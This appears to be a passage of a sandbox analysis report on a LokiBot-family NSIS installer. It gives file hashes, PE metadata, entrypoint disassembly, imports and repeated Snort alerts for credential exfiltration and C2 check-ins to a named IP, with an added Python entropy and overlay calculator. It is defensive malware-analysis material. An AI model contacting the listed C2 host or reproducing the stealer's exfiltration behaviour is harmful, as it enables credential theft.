                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0.Px^.Px^.Px^....Qx^.]*..px^.]*.._x^.]*..:x^.D.X.Rx^.D.Z.Sx^.D._.Ix^.Px_..x^..&Z.Qx^..&^.Qx^..&..Qx^..&\.Qx^.RichPx^.........PE..L......a...........!.....j...h............................................... ..........................................L...............................................................................@............................................text...dh.......j.................. ..`.bss....D................................rdata..FN.......P...n..............@..@.data...............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 1
                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):46
                  Entropy (8bit):1.0424600748477153
                  Encrypted:false
                  SSDEEP:3:/lbON:u
                  MD5:89CA7E02D8B79ED50986F098D5686EC9
                  SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                  SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                  SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: ........................................user.

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):7.929625872337307
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 92.16%
                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:U001P56ybm.exe
                  File size:301040
                  MD5:969e2ccfcacf3573de922d9bce81e3fd
                  SHA1:c3dd33a00d4dad9330d0c2dbc0c3b75396c70f8b
                  SHA256:4a059628d9f56799d68937821b355477502fe0704d41a75c372b1c036061d59f
                  SHA512:9a8e5104bc18ac2bb0987324ce0f602b26ee4435da9d8c869516052067b6d911e4cec839a5619553d15129b6652c75fa489710eca815496b688e25cfeced65bf
                  SSDEEP:6144:rGiOg+450MRKEIC/ICcr8Cnvvso/Y9oPiEPS3nwOJ2YF9WjNZHqo8eXzo9:P5vRYMICasowKqN24Wj3ro9
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                  File Icon

                  Icon Hash:b2a88c96b2ca6a72

                  Static PE Info

                  General

                  Entrypoint:0x4030e3
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:7fa974366048f9c551ef45714595665e

                  Entrypoint Preview

                  Instruction
                  sub esp, 00000180h
                  push ebx
                  push ebp
                  push esi
                  xor ebx, ebx
                  push edi
                  mov dword ptr [esp+18h], ebx
                  mov dword ptr [esp+10h], 00409158h
                  xor esi, esi
                  mov byte ptr [esp+14h], 00000020h
                  call dword ptr [00407030h]
                  push 00008001h
                  call dword ptr [004070B0h]
                  push ebx
                  call dword ptr [0040727Ch]
                  push 00000008h
                  mov dword ptr [0042EC18h], eax
                  call 00007FD554597328h
                  mov dword ptr [0042EB64h], eax
                  push ebx
                  lea eax, dword ptr [esp+34h]
                  push 00000160h
                  push eax
                  push ebx
                  push 00428F90h
                  call dword ptr [00407158h]
                  push 0040914Ch
                  push 0042E360h
                  call 00007FD554596FDFh
                  call dword ptr [004070ACh]
                  mov edi, 00434000h
                  push eax
                  push edi
                  call 00007FD554596FCDh
                  push ebx
                  call dword ptr [0040710Ch]
                  cmp byte ptr [00434000h], 00000022h
                  mov dword ptr [0042EB60h], eax
                  mov eax, edi
                  jne 00007FD55459480Ch
                  mov byte ptr [esp+14h], 00000022h
                  mov eax, 00434001h
                  push dword ptr [esp+14h]
                  push eax
                  call 00007FD554596AC0h
                  push eax
                  call dword ptr [0040721Ch]
                  mov dword ptr [esp+1Ch], eax
                  jmp 00007FD554594865h
                  cmp cl, 00000020h
                  jne 00007FD554594808h
                  inc eax
                  cmp byte ptr [eax], 00000020h
                  je 00007FD5545947FCh
                  cmp byte ptr [eax], 00000022h
                  mov byte ptr [eax+eax+00h], 00000000h

                  Rich Headers

                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804

                  Data Directories

                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74b0 | 0xb4 | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x900 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

                  Sections

                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x5b68 | 0x5c00 | False | 0.67722486413 | data | 6.48746502716 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata | 0x7000 | 0x129c | 0x1400 | False | 0.4337890625 | data | 5.04904254867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0x9000 | 0x25c58 | 0x400 | False | 0.58203125 | data | 4.76995537906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc | 0x37000 | 0x900 | 0xa00 | False | 0.4078125 | data | 3.93441125971 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
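
The section table above describes only the NSIS stub: its raw sizes add up to 0x7e00 bytes (32,256) against a file of 301,040 bytes, so almost 270 KB sit after the last section as the appended installer archive that carries the payload. That is also why the whole-file entropy reported under Static File Info (7.93) is far above the stub's .text (6.49), and why the dropped blob 9bx9q99412rjuw5u scores 7.99 while the dropped DLL scores 6.28. The script below is an added example, not part of the sandbox report or of any sandbox code; it recomputes the 8-bit Shannon entropy the report's "Entropy (8bit)" rows show, applies triage cut-offs that are the author's own assumptions, and estimates the overlay from the report's raw sizes, taking a PE header size of 0x400 as an assumption because the report gives raw sizes but not raw offsets.

```python
"""Shannon entropy and NSIS overlay size, the two numbers behind this report's
"Entropy (8bit)" column and its section layout.

Added example, not part of the sandbox report. The entropy thresholds and the
0x400 header size are assumptions; raw sizes and file size come from the report.
"""
import math
import os
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant stream, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(entropy: float, size: int) -> str:
    """Triage label from entropy and size; the thresholds are assumptions."""
    if size < 64:
        return "too small to judge"       # the 1-byte .lck scores 0.0 regardless
    if entropy >= 7.9:
        return "likely packed/encrypted"  # the 7.99 dropped blob and the 7.93 installer
    if entropy >= 7.2:
        return "compressed or mixed"
    return "plain code/data"              # the 6.28 dropped DLL, the 6.49 .text section


def entropy_report(blobs):
    """blobs: iterable of (name, bytes) -> list of (name, entropy, label)."""
    rows = []
    for name, data in blobs:
        e = shannon_entropy(data)
        rows.append((name, round(e, 3), classify(e, len(data))))
    return rows


def overlay_bytes(file_size: int, headers_size: int, raw_sizes) -> int:
    """Bytes after the last section. For an NSIS installer this is the appended
    archive that holds the real payload, which the section table never shows."""
    return file_size - headers_size - sum(raw_sizes)


# Raw sizes from the report's section table (.text, .rdata, .data, .ndata, .rsrc).
REPORT_RAW_SIZES = (0x5c00, 0x1400, 0x400, 0x0, 0xa00)
REPORT_FILE_SIZE = 301040
ASSUMED_HEADERS_SIZE = 0x400   # assumption; the report does not list raw offsets

# Constructed inputs standing in for the report's files (not the real bytes).
CONSTRUCTED = [
    ("lck_file", b"1"),                                        # mirrors B52B3F.lck
    ("random_blob", os.urandom(64 * 1024)),                    # stands in for the encrypted payload
    ("dos_stub_text", b"This program cannot be run in DOS mode.\r\n" * 400),
]

if __name__ == "__main__":
    for row in entropy_report(CONSTRUCTED):
        print(row)
    print("NSIS overlay (bytes):",
          overlay_bytes(REPORT_FILE_SIZE, ASSUMED_HEADERS_SIZE, REPORT_RAW_SIZES))
```

When triaging an NSIS sample, run the entropy over the overlay (everything past the last section) rather than over the sections: the stub's numbers are the same for every installer built with that NSIS version, and only the overlay says anything about the payload.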

                  Resources

                  Name | RVA | Size | Type | Language | Country
                  RT_ICON | 0x37190 | 0x2e8 | data | English | United States
                  RT_DIALOG | 0x37478 | 0x100 | data | English | United States
                  RT_DIALOG | 0x37578 | 0x11c | data | English | United States
                  RT_DIALOG | 0x37698 | 0x60 | data | English | United States
                  RT_GROUP_ICON | 0x376f8 | 0x14 | data | English | United States
                  RT_MANIFEST | 0x37710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                  Imports

                  DLL | Import
                  KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                  USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                  GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                  SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                  ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                  COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                  ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                  VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                  Possible Origin

                  Language of compilation system | Country where language is spoken
                  English | United States

                  Network Behavior

                  Snort IDS Alerts

                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  11/25/21-18:22:15.658540 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49744 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:15.658540 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49744 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:15.658540 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49744 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:15.658540 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49744 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:18.837898 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49745 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:18.837898 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49745 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:18.837898 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49745 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:18.837898 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49745 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:21.772417 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49746 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:21.772417 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49746 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:21.772417 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49746 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:21.772417 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49746 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:21.949354 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49746 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:23.379975 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49747 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:23.379975 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49747 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:23.379975 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49747 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:23.379975 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49747 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:23.474404 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49747 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:25.292669 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49748 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:25.292669 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49748 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:25.292669 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49748 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:25.292669 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49748 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:25.843662 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49748 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:26.868772 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49749 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:26.868772 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49749 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:26.868772 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49749 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:26.868772 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49749 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:26.965338 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49749 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:28.257549 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49750 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:28.257549 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49750 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:28.257549 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49750 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:28.257549 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49750 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:28.383367 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49750 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:29.608133 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49751 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:29.608133 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49751 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:29.608133 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49751 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:29.608133 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49751 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:30.439113 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49751 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:31.618850 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49752 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:31.618850 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49752 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:31.618850 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49752 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:31.618850 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49752 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:32.376492 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49752 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:35.179306 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49755 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:35.179306 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49755 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:35.179306 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49755 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:35.179306 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49755 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:35.268660 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49755 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:37.775846 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49756 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:37.775846 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49756 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:37.775846 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49756 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:37.775846 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49756 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:39.011205 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49756 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:40.734394 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49757 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:40.734394 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49757 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:40.734394 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49757 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:40.734394 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49757 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:41.150241 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49757 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:44.172505 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49758 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:44.172505 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49758 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:44.172505 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49758 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:44.172505 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49758 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:44.258064 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49758 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:45.537822 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49759 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:45.537822 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49759 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:45.537822 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49759 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:45.537822 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49759 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:46.363115 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49759 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:47.475042 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49760 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:47.475042 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49760 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:47.475042 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49760 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:47.475042 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49760 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:47.564037 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49760 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:48.480656 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49761 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:48.480656 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49761 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:48.480656 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49761 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:48.480656 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49761 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:48.579071 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49761 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:51.071537 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49762 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:51.071537 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49762 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:51.071537 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49762 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:51.071537 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49762 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:51.163780 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49762 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:52.226443 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49763 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:52.226443 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49763 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:52.226443 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49763 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:52.226443 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49763 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:52.969004 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49763 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:54.348325 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49765 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:54.348325 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49765 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:54.348325 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49765 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:54.348325 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49765 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:54.655710 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49765 | 194.85.248.167 | 192.168.2.3
